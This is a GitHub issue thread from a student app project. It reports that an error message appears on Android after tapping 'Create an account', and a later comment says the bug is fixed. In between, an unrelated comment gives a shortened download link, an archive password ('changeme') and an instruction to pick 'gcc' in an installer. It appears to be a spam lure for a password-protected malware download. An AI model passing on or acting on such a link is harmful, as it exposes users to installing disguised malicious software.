### ISSUE TITLE
fix:An error message appears after tap on "Create an account" link

### ISSUE THREAD

**Issue by MarinaBershova** [BinaryStudioAcademy/bsa-2024-bebalance#219]
### Describe your issue

Error message appears after tap on "Create an account" link

### Steps to reproduce

1. Launch the app
2. Tap on "Create an account" link
3. Pay attention to the error message that appears

### What was the actual result?

An error message appeared

### What was the expected result?

An error message dosn't appear

### Put here any screenshots or videos (optional)

![2024-08-27_17h05_10](https://github.com/user-attachments/assets/3b5b322f-62bc-4ce3-a71b-464fb0a4380d)

### What OS are you seeing the problem on?

Android

### What browsers are you seeing the problem on?

Other (mention in the description)

### Severity

Minor (S4)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Helen-Sen** [comment]
The bug is fixed
